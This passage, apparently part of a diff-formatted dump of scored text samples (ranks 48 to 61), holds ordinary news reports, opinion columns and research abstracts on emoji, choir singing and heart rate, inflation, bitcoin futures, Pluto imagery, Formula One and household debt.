rifle,” said a Unicode Consortium member present during the discussion. + +The two characters will still be part of the Unicode spec, but they'll be classed as black-and-white "symbols" instead of regular emoji. Companies that want to add them to their emoji keyboards still can (Google already integrated both into the Android N betas), but they may or may not be supported on other platforms. Both characters were originally included because they were parts of Olympic sports, according to Unicode President Mark Davis. + +Apple has historically been a bit conservative about the more violent emoji—for quite a while, the gun, knife, and a few others were excluded from the macOS emoji picker even though the OS could display them just fine and they were included on the iOS emoji keyboard. + +The final version of the Unicode 9.0 spec is scheduled to be released on June 21. Google and Microsoft have already included Unicode 9.0 emoji in the OS updates they're releasing this fall, and Apple will presumably do the same when it's ready.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 48; Score = 1335296.0 +<|begin_of_text|>Choir singing is known to promote wellbeing. One reason for this may be that singing demands a slower than normal respiration, which may in turn affect heart activity. Coupling of heart rate variability (HRV) to respiration is called Respiratory sinus arrhythmia (RSA). This coupling has a subjective as well as a biologically soothing effect, and it is beneficial for cardiovascular function. RSA is seen to be more marked during slow-paced breathing and at lower respiration rates (0.1 Hz and below). In this study, we investigate how singing, which is a form of guided breathing, affects HRV and RSA. The study comprises a group of healthy 18 year olds of mixed gender. The subjects are asked to; (1) hum a single tone and breathe whenever they need to; (2) sing a hymn with free, unguided breathing; and (3) sing a slow mantra and breathe solely between phrases. Heart rate (HR) is measured continuously during the study. The study design makes it possible to compare above three levels of song structure. In a separate case study, we examine five individuals performing singing tasks (1–3). We collect data with more advanced equipment, simultaneously recording HR, respiration, skin conductance and finger temperature. We show how song structure, respiration and HR are connected. Unison singing of regular song structures makes the hearts of the singers accelerate and decelerate simultaneously. Implications concerning the effect on wellbeing and health are discussed as well as the question how this inner entrainment may affect perception and behavior. + +Introduction + +This paper aims to illuminate and discuss how singing (Grape et al., 2003) and especially choir singing (Marti, 2012) promotes wellbeing. We focus on the interplay between two oscillators: the respiratory organ and the heart, while singing. The heart does not keep a constant rhythm. On the contrary, heart rate (HR) is accelerating and decelerating constantly. This fluctuation in HR is called heart rate variability (HRV). In this article, we mainly speak of the dynamic aspects of HRV, i.e., how HR develops over time forming cycles of HR fluctuations, but we also measure HRV by RMSSD (Root Mean Square of the Successive Differences) (Degiorgio et al., 2010). + +It is known that HRV and respiration rate affect each other. This interdependency, first discussed by (Ludwig, 1847), is referred to as respiratory sinus +================================================================================ +Rank = 49; Score = 1310720.0 +<|begin_of_text|>In the first place, studies that measure income inequality largely focus on pretax incomes while ignoring the transfer payments and spending from unemployment insurance, food stamps, Medicaid and other safety-net programs. Politicians who rest their demands for more redistribution on studies of income inequality but leave out the existing safety net are putting their thumb on the scale. + +Second and more important, it is well known that people's earnings in general rise over their working lifetime. And so, for example, a person who decides to invest more in education may experience a lengthy period of low income while studying, followed by significantly higher income later on. Snapshot measures of income inequality can be misleading. + +According to data from the Bureau of Labor Statistics' Consumer Expenditure Survey, if you sort households according to their pretax income, in 2010 the bottom fifth accounted for 8.7% of overall consumption, the middle fifth for 17.1%, and the top fifth for about 38.6%. Go back 10 years to 2000—before two recessions, the Bush tax cuts, and continuing expansions of globalization and computerization—and the numbers are similar. The bottom fifth accounted for 8.9% of consumption, the middle fifth for 17.3%, and the top fifth for 37.3%. + +While this stability is something to applaud, surely more important are the real gains in consumption by income groups over the past decade. From 2000 to 2010, consumption has climbed 14% for individuals in the bottom fifth of households, 6% for individuals in the middle fifth, and 14.3% for individuals in the top fifth when we account for changes in U.S. population and the size of households. This despite the dire economy at the end of the decade. + +The percentage of low-income households with microwave ovens grew to 92.4% from 74.9% between 2001 and 2009. Fully 75.5% of low-income Americans now have a cell phone, and over a quarter of those have access to the Internet through their phones. + +We would hazard a guess that if you were to ask a typical low-income American in 2009 if he would like to trade his house for its 2001 version, he would tell you to take a hike. How then is he worse off in 2009? + +So poor people are not in fact getting worse off because when they get worse off, we give them food stamps. That's exactly the sort of deep thinking I would +================================================================================ +Rank = 50; Score = 1294336.0 +<|begin_of_text|>NEW YORK (Reuters) - Nasdaq Inc plans to launch a futures contract based on bitcoin in 2018, making it the third exchange operator to plan U.S. derivatives contracts linked to the digital currency, a source with knowledge of the matter said on Wednesday. + +FILE PHOTO: A copy of bitcoin standing on PC motherboard is seen in this illustration picture, October 26, 2017. REUTERS/Dado Ruvic/File Photo + +The price of bitcoin topped $11,000 on Wednesday less than a day after passing the $10,000 mark and has increased more than 10-fold in value so far this year, prompting concerns of a bubble. + +CME Group, the world’s largest derivatives exchange, and CBOE Holdings, have both said they plan to launch futures products based on bitcoin this year, pending regulatory approval, helping fuel the crypto-currency’s rally. + +While Nasdaq does not have a hard date set for its product, the transatlantic exchange operator has offered an exchange-traded note based on bitcoin on its Stockholm exchange since 2015. + +Nasdaq has teamed up with New York-based money manager VanEck to develop the futures contract, which will be cleared by the Options Clearing Corporation. The OCC clears all Nasdaq futures products, the source said. + +VanEck had applied to the U.S. Securities and Exchange Commission (SEC) this year to launch a bitcoin-related exchange-traded fund, but withdrew the request in September after speaking with SEC staff, according to a regulatory filing. + +The SEC requested that VanEck wait until the underlying instruments in which the ETF planned to primarily invest - bitcoin futures contracts - become available for investment, the filing said. + +A representative for VanEck was not immediately available for comment. + +One of the ways the Nasdaq futures product will differ from CME’s and CBOE’s is that it will be based on an index that takes in prices from more than 50 bitcoin exchanges, the source said. + +CME has said it’s bitcoin future will be based on the CF Bitcoin Reference Rate (BRR), a once-a-day reference rate of the U.S. dollar price of bitcoin, that currently takes prices from four bitcoin exchanges. CBOE will price its bitcoin future off the Gemini Trust, the digital currency exchange founded by brothers Cameron and Tyler Winklevoss. + +The SEC in March denied a request for CBOE to list what would have been the first U.S. ETF built to track bitcoin.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 51; Score = 1245184.0 +<|begin_of_text|>"You must be the only person worried about inflation, Liam". So I was told on Newsnight last week – by someone who's spent four of the last five years in the cabinet. + +Almost lost for words, I blurted an answer before Mr Paxman intervened. + +But I left the television studio shocked that the former minister, someone of genuine ability, could be so ignorant of life beyond the Westminster village. + +"Inflation, not deflation" is a recurrent theme of this column. That's because the Western world's response to the "credit crunch", this orgy of wildly expansive policy using "deflation is nigh" as an alibi, amounts to a repeated whacking of the self-destruct button. + +Almost everyone outside the "political and media elite" knows this. Amidst "deflation is upon us" warnings from this elite, UK CPI inflation went up last month – to 3.2pc. CPI understates true inflation. But even CPI is above the Bank of England's target – and has been for 17 months. + +So if I'm the only one worried, why is Mervyn King writing repeated letters acknowledging inflation is too high? + +Sterling is down a third in 18 months. Import prices are soaring. The UK's monetary base is doubling. + +"Broad" M4 money is expanding at 16pc a year. Food price inflation is 8pc, with double-digit producer price inflation too – as the credit crunch destroys supply chains. + +Warren Buffett, the most successful living investor, foresees an "inflation onslaught". Peter Brabeck, the Nestlé chairman and one of the world's top businessmen, says "Now the printing machine is starting, this is the start of inflation." + +China and other major creditors are rightly concerned Western governments – particularly the US and UK – want to inflate away their sovereign debts. + +That's why the "bond vigilantes" are stirring and we could very soon face a gilts strike. + +If I'm the only one worried about inflation, why is the price of gold so high, with the price of commodities also up sharply – even though the global demand outlook is weak? + +If I'm the only one worried about inflation, why does the latest report of the Bank of England's pension scheme show it recently changed it allocation of index-linked instruments – the ultimate anti-inflation hedge – from 25pc to more than 70pc of its portfolio? + +Am I the only one worried? I so wish that was true. We face an inflation tsunami. And +================================================================================ +Rank = 52; Score = 1196032.0 +<|begin_of_text|>The International Energy Association (IEA) announced a plan today to make 60 million barrels of oil available to the market over the next month from the Strategic Petroleum Reserve (SPR), in response to the disturbance in supplies from Libya. Half of this oil is to come from the SPR of the United States; the rest is to come from SPRs of other members of OECD. + +Both the amount and the timing of the release are strange. The amount of the release is equivalent to 2 million barrels a day. This is actually more than the Libyan disruption took off the market, which was about 1.4 million barrels a day. The disruption first took place in February, and oil prices have been declining since early May, so the timing is strange, as well. + +What the timing of the oil release is close to, is the end of Quantitative Easing 2 (QE2). QE2 is the United States’ program of buying back debt to keep interest rates low and the dollar low, which began November 2010 and is scheduled to end June 30, 2011. It was intended to stimulate the economy, and oil prices have indeed risen during most of the time it was in effect. + +Today’s announcement of the SPR oil-release program was made by IEA, but a person can’t help but wonder if the United States wasn’t heavily involved in the decision. After all, the United States is the largest member of the IEA, and is making half the release itself. Also, when Ben Bernanke spoke yesterday, he didn’t have any financial replacement for QE2. The release of oil from the SPR looks as if it is the latest attempt to kick-start the economy, both of the US and other OECD countries, using yet another approach. + +If we look at oil price and the S&P 500 Index (Figure 2), there has been a significant correlation between the two since late 2008. When oil prices drop, so does the S&P 500 Index, most likely since this means the economy is “tanking.” When oil prices rise, so does the S&P 500 Index, indicating the economy is working well. + +The problem is that high oil prices soon sow the seed of their own destruction. Once the oil price starts getting high (over $85 is high, over $110 is very high), the high oil prices start causing recessionary influences, because citizens have to cut back on other goods, when oil and food prices start rising. Oil and food prices usually rise and fall +================================================================================ +Rank = 53; Score = 1196032.0 +<|begin_of_text|>Chinese nuclear giant officially launched + +16 July 2015 + +Share + +A ceremony was held in Beijing yesterday to mark the official launch of China's State Power Investment Corporation (SPI), formed through the merger of China Power Investment Corporation (CPI) and State Nuclear Power Technology Corporation (SNPTC). + +A plan for the merger of China's general contractor for reactors SNPTC and nuclear power plant operator CPI was submitted to the State-owned Assets Supervision and Administration Commission (SASAC) for approval by SNPTC in July 2014. The merger was approved by the State Council on 29 May. + +The combined company formally established yesterday has a registered capital of CNY 45 billion ($7 billion), with total assets of CNY 722.3 billion ($116.3 billion) and, due to CPI's numerous subsidiaries and their extensive activities, almost 14 million employees in total. The business encompasses hydro, thermal and nuclear power, as well as new energy sources. SPI has an installed generating capacity of 98 gigawatts. The company also covers electricity, coal, aluminium production, logistics, finance and other sectors. Annual sales are expected to exceed CNY 200 billion ($32 billion). + +CPI is one of five state-owned power generation holding companies formed from the State Power Corporation in 2002 and inheriting all of its nuclear capacity. It owns 19 operating power plants above 1000 MWe each, a majority of Shandong Haiyang nuclear power project, 45% of the first phase of Liaoning Hongyanhe nuclear power project, and holds minority shares in five nuclear power plants in operation, and three under construction. It is preparing nuclear power projects in Guangxi, Liaoning, Hunan, Jilin and Chongqing. + +SNPTC was set up in 2004 to take charge of technology selection for new plants bid from overseas. The company was directly under China's State Council and closely connected with it, being owned 70% by SASAC and with 10% of shares owned by each of China National Nuclear Corporation (CNNC), CPI and China General Nuclear Corporation (CGN). + +SPI chairman Wang Binghua, former chairman of SNPTC, was cited by China's CCTV as saying that China relies on fossil fuels for nearly 70% of its electricity needs, "leaving a large space" for nuclear power. He added that SPI, CNNC and CGN will enjoy strategic cooperation and healthy competition. + +Researched and written + +by World Nuclear News + + +================================================================================ +Rank = 54; Score = 1179648.0 +<|begin_of_text|>The headline on a recent piece by Ylan Mui of the Washington Post—“Why the Fed is rethinking everything”—captured the current moment well. The Federal Reserve has indeed been revising its views on some key aspects of the economy, and that’s been affecting its outlook both for the economy and for monetary policy. In this post I document and explain the ongoing shift in the Fed’s economic views. I then turn to some implications, suggesting among other things that, for now at least, Fed-watchers should probably focus on incoming data and count a bit less on Fed policymakers for guidance. + +Talking about the “Fed’s thinking” is of course very loose. There are few official communications from the Federal Open Market Committee (FOMC) as a whole, and those that exist (such as the statements issued after each FOMC meeting) have the prose style that might be expected of a document prepared by a large committee. The usual practice therefore is to try to infer the FOMC’s policy inclinations from the views expressed by individual FOMC participants in various forums. To quantify changes in the thinking of FOMC participants, I use in this post the Fed’s Summary of Economic Projections, a summary of participants’ forecasts that the Committee releases four times a year. + +Shifting views on the economy. Each quarter, individual FOMC participants—the Washington-based members of the Fed’s Board of Governors and all 12 of the regional Federal Reserve Bank presidents—submit their projections of how they expect certain key economic variables to evolve over the next 2-3 years and in the longer run. “Longer-run” projections are defined by the Fed as the values to which the variables in question are expected to converge under appropriate monetary policy and in the absence of further shocks to the economy; these projections can thus be thought of as the “steady-state” or “normal” levels of the variables, to which the economy tends over time. I’ll focus here on FOMC participants’ longer-run projections of three variables—output growth, the unemployment rate, and the policy interest rate (the federal funds rate)—and designate these longer-run values by y*, u*, and r*, respectively. Under the interpretation that these projections equal participants’ estimates of steady-state values, each of these variables is of fundamental importance for thinking about the behavior of the economy: + +Projections of y* can be thought of as estimates of potential output growth, that is, the economy’s attainable rate of growth in the long run when resources +================================================================================ +Rank = 55; Score = 1179648.0 +<|begin_of_text|>Image copyright NASA/JHUAPL/SWRI Image caption This strange terrain is on the eastern edge of the new colour image from the Ralph camera + +A great swathe of Pluto that features a strange rippling terrain is perhaps the highlight of the latest image release from the New Horizons mission. + +The Nasa probe, which flew by the dwarf planet in July, continues to downlink its data, and as it comes in, the scientists get to work on it. + +The ripples stretch for many hundreds of km. + +"It looks more like tree bark or dragon scales than geology," observed mission team member Bill McKinnon. + +"This'll really take time to figure out; maybe it's some combination of internal tectonic forces and ice sublimation driven by Pluto's faint sunlight," the Washington University, St Louis, scientist said in a US space agency release. + +The best way to look at "scales" is to browse the new high-resolution enhanced colour view of Pluto that has been made available (PNG file, 70MB). The features are on the far eastern edge. + +Image copyright NASA/JPLJHU/SWRI Image caption The image resolves details and colours on scales as small as 1.3km + +This super image comes from the Ralph/Multispectral Visual Imaging Camera on New Horizons. It combines blue, red and near infrared (NIR) images. + +The enhanced view will help decode the various geological and climatological processes that have worked together to produce all the complex surface features seen on Pluto. + +Alex Parker, a team member from the Southwest Research Institute, Boulder, worked on the Ralph portrait. + +"This image consumed the better part of this week for me," he tweeted. + +"I removed striping noise and deconvolved the images, massively improving sharpness. + +"Since the NIR, red and blue images used to make this colour composite are taken separately, they have to be precisely aligned in software. + +"The instrument is a TDI (time delay and integration) camera, and has funny spatial distortions. I removed all of these by hand to create the final colour product." + +Image copyright NASA/JPLJHU/SWRI Image caption The Lorri mosaic is probably the highest resolution view yet of the surface of Pluto + +Also released this week are probably the highest-resolution images seen so far. + +They come from the Lorri camera and show details down to 270m across. Lorri is a black and white camera, but the imagery released by Nasa has been coloured with Ralph information. + +The mosaic includes a +================================================================================ +Rank = 56; Score = 1179648.0 +<|begin_of_text|>Job creation in the private sector tailed off significantly in June in another sign that the economy is getting closer to full employment, according to a report Thursday from ADP and Moody's Analytics. + +Companies added 158,000 positions for the month, a number that economists who released the report said was still strong but stood well below the robust 230,000 number the report showed in May. The reading also was considerably below the 185,000 gain that economists surveyed by Reuters expected, and was revised lower from the initial 253,000 count. + +"The job market continues to power forward," Moody's Analytics chief economist Mark Zandi said in a statement. "At this pace, which is double the rate of labor force growth, the tight labor market will continue getting tighter." + +The ADP/Moody's release comes a day before the government's closely watched monthly nonfarm payrolls count. The market is expecting that report to show a gain of about 180,000 jobs in June. However, the two numbers sometimes don't mesh — in May, the ADP count of 230,000 was well ahead of the 138,000 in the Bureau of Labor Statistics report. + +All of the June jobs in the ADP/Moody's count came from services, with professional and business positions showing the biggest gain at 69,000. Administrative and support services contributed 43,000 while the trade, transportation and utilities category grew by 30,000. + +On the other side of the ledger, education lost 6,000 jobs, natural resources and mining declined by 4,000 and construction fell by 2,000. + +Businesses with 50 to 499 employees led the way with 91,000, while large firms added 50,000. Small business, which has led job creation through much of the recovery, saw growth of just 17,000 for the month. + +Federal Reserve policymakers are watching the employment reports closely. Officials at the central bank are curious not only about job creation but also the effect that a tightening labor market is having on wages. Salary growth has remained muted for much of the recovery, and June is expected to show an annualized gain of 2.6 percent. Minutes released Wednesday from the June meeting of the Federal Open Market Committee indicate that the Fed is likely to raise rates at least once more this year and to begin reducing its $4.5 trillion balance sheet portfolio of bonds, despite the lack of inflation pressures. This is breaking news. Please check back for updates.<|end_of_text|><|end_of_text|> +================================================================================ +Rank = 57; Score = 1171456.0 +<|begin_of_text|>“Home life ceases to be free and beautiful as soon as it is founded on borrowing and debt” Henrik Ibsen + +According to Oxford Dictionary the term Slave is defined as “a person who is the legal property of another and is forced to obey them” as in the case of the United States during the 18th and 19th centuries where slavery was a legalized institution. Oxford dictionary also defines slavery as “a person who works very hard without proper remuneration or appreciation” as in today’s world of a person working for a company or corporation where their efforts are usually under appreciated. It also describes a slave as “a person who is excessively dependent upon or controlled by something” or “a device, or part of one, directly controlled by another”. Debt can be an instrument used to control an individual or a nation for that matter. In this case, an individual is dependent upon “Credit” to buy products. + +Then the credit becomes a debt that has to be repaid. It becomes a “control mechanism” as the creditor becomes the “Slave Owner” and the debtor becomes the “Slave”. What is the point? In today’s world of unlimited credit, consumers become modern-day slaves to their creditors. What is the difference between slavery in 18th century America with imported African slaves and the America of 2013? There is no difference besides the physical abuse of the African slaves by their owners. In America, consumers suffer psychological abuse by its creditors. As long as an individual remains in debt bondage, that person will have to repay that debt until the day that person literally dies in most cases. + +Black Friday is the day that starts the most important holiday for big name retailers and Wall Street speculators and that is Christmas. It is the shopping season that investors, economists and corporations pay close attention to as they measure consumer confidence and the profits they reap from consumer spending. Major retailers and corporations such as Wal-Mart expect to make profits. Wall Street expects consumers to spend on Black Friday through the Christmas holidays following the Federal Reserve’s continued policies of Quantitative Easing (QE). Economists across the spectrum predict that the new Federal Reserve chairwoman Janet Yellen will continue to buy US bonds indefinitely continuing Ben Bernanke’s current policies. + +All the while consumers continue to accumulate debt. Black Friday was marked with chaos followed by violence as mobs of consumers’ raided shopping centers and malls for discounts and sales on numerous products including flat screen televisions, toys, clothing and other goods they most likely don’t need. Regardless of the economic +================================================================================ +Rank = 58; Score = 1163264.0 +<|begin_of_text|>The male is often troubled by concerns that his penis is not large enough to satisfy his partner or himself. He is ashamed to have others view his penis, especially in the flaccid state. Such concerns might be unfounded in reality and might be a presentation of social anxiety or some other clinical problem, such as erectile dysfunction. Concern over the size of the penis, when such concern becomes excessive, might present as the ‘small penis syndrome’, an obsessive rumination with compulsive checking rituals, body dysmorphic disorder, or as part of a psychosis. However, it is often a worry that can be described as within the normal experience of many men. Various potential causal factors are considered. A thorough assessment, normalizing the worry and then exploring the treatment options in detail with the man, is essential to allow the matter to be consolidated satisfactorily within the male ego. + +Abbreviations SPS small penis syndrome BDD body dysmorphic disorder (dysmorphophobia) ED erectile dysfunction CBT cognitive behavioural therapy SSRI selective serotonin reuptake inhibitor. + +INTRODUCTION The penis, particularly in its erect state, is a symbol of masculinity. In many cultures it has come to symbolise attributes such as ‘largeness, strength, endurance, ability, courage, intelligence, knowledge, dominance over men, possession of women; a symbol of loving and being loved’. A review [1] is recommended which describes Indian Sadhus using weights, Dayak men in Borneo piercing the glans and then inserting items in the resultant holes to stimulate the partner, and the Topinama of Brazil, who encourage poisonous snakes to bite their penis to make it enlarge (for 6 months!). Some of these concepts date back over many thousands of years, and there is evidence that prehistoric cave dwellers attributed the symbolic values of strength and power to penile size, as well as those of virility and fertility, a process also recommended in the Kama Sutra [2]. Given the historical context it is perhaps no surprise that even today many men place great importance on the size of their penis. Hegemonic masculinity is defined by attributes such as physical strength, heterosexuality with authority over women and other men, showing no emotions (such as remorse and uncertainty, which might suggest vulnerability), economic independence, and an ability to demonstrate sexual ‘conquest’. While most men do not embody all of these qualities, society supports hegemonic masculinity within most of its institutions [3]. Given this historical and cultural background, it is perhaps unsurprising that for +================================================================================ +Rank = 59; Score = 1138688.0 +<|begin_of_text|>The Formula One World Constructors' Championship (WCC) is awarded by the FIA to the most successful Formula One constructor over a season, as determined by a points system based on Grand Prix results. The Constructors' Championship was first awarded, as the International Cup for F1 Manufacturers, in 1958 to Vanwall. + +Constructors' Championship points are calculated by adding points scored in each race by any driver for that constructor. Up until 1979, most seasons saw only the highest-scoring driver in each race for each constructor contributing points towards the Championship. On only ten occasions has the World Constructors' Champion team not contained the World Drivers' Champion for that season. + +In the 61 seasons the Championship has been awarded, only 15 different constructors have won it, with Scuderia Ferrari the most successful, with 16 titles including 6 consecutive from 1999 to 2004. Only five countries have produced winning constructors: United Kingdom (33 championships with 10 different constructors), Italy (16 with Ferrari), Germany (5 with Mercedes), Austria (4 with Red Bull) and France (3 with two constructors). However, all German, Austrian and French titles have seen the winning cars designed and built (except Matra in 1969) and run by teams based in the United Kingdom. Among drivers that have contributed with at least a single point to the constructors' title, Michael Schumacher has the unofficial record, having been involved with seven such titles, six of those consecutively with Ferrari.[1] Schumacher won the world drivers' title on six of those seven occasions. + +By season [ edit ] + +The constructors' trophy + +Notes [ edit ] + +* – indicates that the driver also won the Drivers' Championship. + +By constructor [ edit ] + +Note: Constructors in bold have competed in the 2018 World Championship. + +By nationality [ edit ] + +By engine [ edit ] + +Engine manufacturers and constructors in bold have competed in the 2018 World Championship. + +^ * Built by Cosworth + +^ ** In 1998 built by Ilmor + +^ *** Built by Porsche + +By driver [ edit ] + +Notes: + +* – Posthumously. World Drivers' Champions, since 1958, who never contributed to a Constructors' Championship, were Ferrari's Mike Hawthorn (1958), McLaren's James Hunt (1976), and Williams's Keke Rosberg (1982). Drivers and constructors in bold have competed in the 2018 World Championship. + +See also [ edit ] + +References [ edit ]<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 60; Score = 1138688.0 +<|begin_of_text|>Key consumer debt measure hits record + +Net worth boosted by stocks, housing + +Consumer credit growth may be slowing in Canada, but the key measure of household debt has hit a record. + +That measure, household credit market debt to disposable income, climbed in the third quarter of the year to 163.7 per cent, from a revised 163.1 per cent in the previous three-month period, Statistics Canada said Friday. + +At the same time, the net worth of Canadian families rose 2.2 per cent, buoyed by rising stock markets and property values. + +Story continues below advertisement + +On a per-capita basis, net worth among Canadian households rose in the latest quarter to $211,400, though that masks the income inequality across the country. + +"Shares and other equities grew on the basis of the rebound in domestic and foreign equity markets," Statistics Canada said. + +"The increase in household net worth was also supported by a 1.5-per-cent gain in the value of household real estate." + +The higher debt burden could well spell trouble for some families when interest rates inevitably rise, though the Bank of Canada is believed to be more than a year away from such a move. + +Here are some of the highlights from the federal agency's report: + +Household net worth rose by 2.2 per cent to $211,000, led by a 3.7-per-cent rise in the stock market. + +Real estate values rose by 1.5 per cent. + +Consumer credit debt rose by 1 per cent to $505-billion. + +The consumer credit debt to disposable income ratio climbed to 163.7 per cent from 163.1 per cent. + +Mortgage debts rose by 1.8 per cent to $1.1-trillion, compared with the average quarterly growth of 1.7 per cent over the past five years. + +National net worth climbed 2.1 per cent to $7.5-trillion, or, on a per-capita basis, $212,700. That's a slower pace than the second quarter's 3.2-per-cent rise. + +Home sales, of course, have rebounded smartly in Canada since the short government-induced slump in the summer of 2012, brought on by new mortgage insurance restrictions aimed at stopping a bubble. + +Some of that is deemed to be the result of home buyers jumping in earlier than they otherwise would have because of higher mortgage rates and speculation of further increases. + +Story continues below advertisement + +Story continues below advertisement + +Thus, economists believe the debt burden will +================================================================================ +Rank = 61; Score = 1130496.0 +<|begin_of_text|>From the Kansas City Fed: Tenth District Manufacturing Activity Strengthened Further + +The Federal Reserve Bank of Kansas City released the March Manufacturing Survey today. According to Chad Wilkerson, vice president and economist at the Federal Reserve Bank of Kansas City, the survey revealed that Tenth District manufacturing activity strengthened further with strong expectations for future activity. + +“Our composite index accelerated again, and has only been higher one time in the last 15 years,” said Wilkerson. “The future employment index was the strongest in the 23-year history of the survey." + +... + +The month-over-month composite index was 20 in March, its highest reading since March 2011, up from 14 in February and 9 in March. The composite index is an average of the production, new orders, employment, supplier delivery time, and raw materials inventory indexes. Activity in both durable and nondurable goods plants increased, particularly for metals, computer, electronic, and aircraft products. Most month-over-month indexes rose further in March. The production and shipments indexes increased considerably, while the new orders and order backlog indexes rose more moderately but remained high. The employment index moderated slightly from 17 to 13, and the new orders for exports index also eased. Both inventory indexes increased for the second straight month. + +emphasis added + +The Kansas City region was hit hard by the decline in oil prices, but activity is expanding solidly again. The regional Fed surveys released so far suggest another strong reading for the ISM manufacturing index for March.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of